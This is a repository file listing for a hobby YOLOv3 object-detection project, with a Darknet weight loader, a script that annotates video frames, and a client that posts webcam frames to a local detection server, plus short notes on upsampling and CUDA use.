                prev_width = out_widths[layers[0]]
                prev_height = out_heights[layers[0]]
                prev_filters = out_filters[layers[0]]
            elif len(layers) == 2:
                print('%5d %-6s %d %d' % (ind, 'route', layers[0], layers[1]))
                prev_width = out_widths[layers[0]]
                prev_height = out_heights[layers[0]]
                assert(prev_width == out_widths[layers[1]])
                assert(prev_height == out_heights[layers[1]])
                prev_filters = out_filters[layers[0]] + out_filters[layers[1]]
            out_widths.append(prev_width)
            out_heights.append(prev_height)
            out_filters.append(prev_filters)
        elif block['type'] in ['region', 'yolo']:
            print('%5d %-6s' % (ind, 'detection'))
            out_widths.append(prev_width)
            out_heights.append(prev_height)
            out_filters.append(prev_filters)
        elif block['type'] == 'shortcut':
            from_id = int(block['from'])
            from_id = from_id if from_id > 0 else from_id+ind
            print('%5d %-6s %d' % (ind, 'shortcut', from_id))
            prev_width = out_widths[from_id]
            prev_height = out_heights[from_id]
            prev_filters = out_filters[from_id]
            out_widths.append(prev_width)
            out_heights.append(prev_height)
            out_filters.append(prev_filters)
        else:
            print('unknown type %s' % (block['type']))


def load_conv(buf, start, conv_model):
    num_w = conv_model.weight.numel()
    num_b = conv_model.bias.numel()
    conv_model.bias.data.copy_(torch.from_numpy(buf[start:start+num_b])); start = start + num_b
    conv_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_w]).view_as(conv_model.weight.data)); start = start + num_w
    return start


def load_conv_bn(buf, start, conv_model, bn_model):
    num_w = conv_model.weight.numel()
    num_b = bn_model.bias.numel()
    bn_model.bias.data.copy_(torch.from_numpy(buf[start:start+num_b])); start = start + num_b
    bn_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_b])); start = start + num_b
    bn_model.running_mean.copy_(torch.from_numpy(buf[start:start+num_b])); start = start + num_b
    bn_model.running_var.copy_(torch.from_numpy(buf[start:start+num_b])); start = start + num_b
    conv_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_w]).view_as(conv_model.weight.data)); start = start + num_w
    return start
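A quick sanity check, not part of `darknet.py`, showing that the `view`/`expand` trick in the `Upsample` module above is ordinary nearest-neighbour upsampling (assumes PyTorch is installed and the snippet is run next to `darknet.py`):
```
import torch
import torch.nn.functional as F
from darknet import Upsample

x = torch.arange(16, dtype=torch.float32).view(1, 1, 4, 4)
custom = Upsample(stride=2)(x)                              # view/expand repeat of each pixel
builtin = F.interpolate(x, scale_factor=2, mode="nearest")  # reference implementation
print(torch.equal(custom, builtin))                         # expected: True
```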
CaesarObjectDetection/data/coco.names
ADDED
@@ -0,0 +1,3 @@
version https://git-lfs.github.com/spec/v1
oid sha256:634a1132eb33f8091d60f2c346ababe8b905ae08387037aed883953b7329af84
size 625
CaesarObjectDetection/images/cat.jpg
ADDED
Git LFS Details
CaesarObjectDetection/images/city_scene.jpg
ADDED
Git LFS Details
CaesarObjectDetection/images/dog.jpg
ADDED
Git LFS Details
CaesarObjectDetection/images/dog2.jpg
ADDED
Git LFS Details
CaesarObjectDetection/images/eagle.jpg
ADDED
Git LFS Details
CaesarObjectDetection/images/food.jpg
ADDED
Git LFS Details
CaesarObjectDetection/images/giraffe.jpg
ADDED
Git LFS Details
CaesarObjectDetection/images/horses.jpg
ADDED
Git LFS Details
CaesarObjectDetection/images/man-in-black-and-white-jacket-riding-brown-horse-3596689.jpg
ADDED
Git LFS Details
CaesarObjectDetection/images/motorbike.jpg
ADDED
Git LFS Details
CaesarObjectDetection/images/nathan-rogers-jMmv6HhHb0k-unsplash.jpg
ADDED
Git LFS Details
CaesarObjectDetection/images/person.jpg
ADDED
Git LFS Details
CaesarObjectDetection/images/street.jpg
ADDED
Git LFS Details
CaesarObjectDetection/images/surf.jpg
ADDED
Git LFS Details
CaesarObjectDetection/read_video.py
ADDED
@@ -0,0 +1,112 @@
import cv2
import numpy as np

import time
import sys

CONFIDENCE = 0.5
SCORE_THRESHOLD = 0.5
IOU_THRESHOLD = 0.5
config_path = "cfg/yolov3.cfg"
weights_path = "weights/yolov3.weights"
font_scale = 1
thickness = 1
labels = open("data/coco.names").read().strip().split("\n")
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype="uint8")

net = cv2.dnn.readNetFromDarknet(config_path, weights_path)

ln = net.getLayerNames()
try:
    ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
except IndexError:
    # in case getUnconnectedOutLayers() returns 1D array when CUDA isn't available
    ln = [ln[i - 1] for i in net.getUnconnectedOutLayers()]
# read the file from the command line
video_file = sys.argv[1]
cap = cv2.VideoCapture(video_file)
_, image = cap.read()
h, w = image.shape[:2]
fourcc = cv2.VideoWriter_fourcc(*"XVID")
out = cv2.VideoWriter("output.avi", fourcc, 20.0, (w, h))
while True:
    _, image = cap.read()

    h, w = image.shape[:2]
    blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
    net.setInput(blob)
    start = time.perf_counter()
    layer_outputs = net.forward(ln)
    time_took = time.perf_counter() - start
    print("Time took:", time_took)
    boxes, confidences, class_ids = [], [], []

    # loop over each of the layer outputs
    for output in layer_outputs:
        # loop over each of the object detections
        for detection in output:
            # extract the class id (label) and confidence (as a probability) of
            # the current object detection
            scores = detection[5:]
            class_id = np.argmax(scores)
            confidence = scores[class_id]
            # discard weak predictions by ensuring the detected
            # probability is greater than the minimum probability
            if confidence > CONFIDENCE:
                # scale the bounding box coordinates back relative to the
                # size of the image, keeping in mind that YOLO actually
                # returns the center (x, y)-coordinates of the bounding
                # box followed by the boxes' width and height
                box = detection[:4] * np.array([w, h, w, h])
                (centerX, centerY, width, height) = box.astype("int")

                # use the center (x, y)-coordinates to derive the top and
                # and left corner of the bounding box
                x = int(centerX - (width / 2))
                y = int(centerY - (height / 2))

                # update our list of bounding box coordinates, confidences,
                # and class IDs
                boxes.append([x, y, int(width), int(height)])
                confidences.append(float(confidence))
                class_ids.append(class_id)

    # perform the non maximum suppression given the scores defined before
    idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)

    font_scale = 1
    thickness = 1

    # ensure at least one detection exists
    if len(idxs) > 0:
        # loop over the indexes we are keeping
        for i in idxs.flatten():
            # extract the bounding box coordinates
            x, y = boxes[i][0], boxes[i][1]
            w, h = boxes[i][2], boxes[i][3]
            # draw a bounding box rectangle and label on the image
            color = [int(c) for c in colors[class_ids[i]]]
            cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)
            text = f"{labels[class_ids[i]]}: {confidences[i]:.2f}"
            # calculate text width & height to draw the transparent boxes as background of the text
            (text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]
            text_offset_x = x
            text_offset_y = y - 5
            box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
            overlay = image.copy()
            cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
            # add opacity (transparency to the box)
            image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
            # now put the text (label: confidence %)
            cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
                        fontScale=font_scale, color=(0, 0, 0), thickness=thickness)

    out.write(image)
    cv2.imshow("image", image)

    if ord("q") == cv2.waitKey(1):
        break


cap.release()
cv2.destroyAllWindows()
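`read_video.py` runs the `cv2.dnn` network on the CPU. If OpenCV was built with CUDA support (the stock pip wheel is not; a self-compiled build is assumed here), the same network can be pushed to the GPU with two extra calls right after `readNetFromDarknet`; a hedged sketch:
```
# Optional, only works with a CUDA-enabled OpenCV build
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)
```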
CaesarObjectDetection/requirements.txt
ADDED
@@ -0,0 +1,3 @@
opencv-python
numpy
matplotlib
CaesarObjectDetection/sendweb.py
ADDED
@@ -0,0 +1,51 @@

import socketio
import cv2
import numpy as np
import requests
import base64
import time
#sio = socketio.Client()

#sio.connect('http://localhost:5000')

#sio.emit('man', {'from': 'client'})

#@sio.on("capture")
#def capture():


#cv2.imshow("image", image)
#if ord("q") == cv2.waitKey(1):
#    break

#cap.release()
#cv2.destroyAllWindows()


#@sio.on('response')
#def response(data):
#    print(data) # {'from': 'server'}

#    sio.disconnect()
#    exit(0)

cap = cv2.VideoCapture(0)
while True:
    _, image = cap.read()
    response = requests.post("http://127.0.0.1:5000/caesarobjectdetect",json={"frame":base64.b64encode(image).decode()})
    imagebase64 = np.array(response.json()["frame"])

    image = np.frombuffer(base64.b64decode(imagebase64),dtype="uint8").reshape(480,640,3)
    cv2.imshow("image", image)
    if ord("q") == cv2.waitKey(1):
        break

cap.release()
cv2.destroyAllWindows()
# @sio.on('caesarobjectresponse')
#def caesarobjectresponse(image):
#    #print(image)
#    cv2.imshow("image", {'frame':np.array(image["frame"])})
#sio.emit("caesarobjectdetect",{'frame':str(image)})
CaesarObjectDetection/stop
ADDED
@@ -0,0 +1 @@
q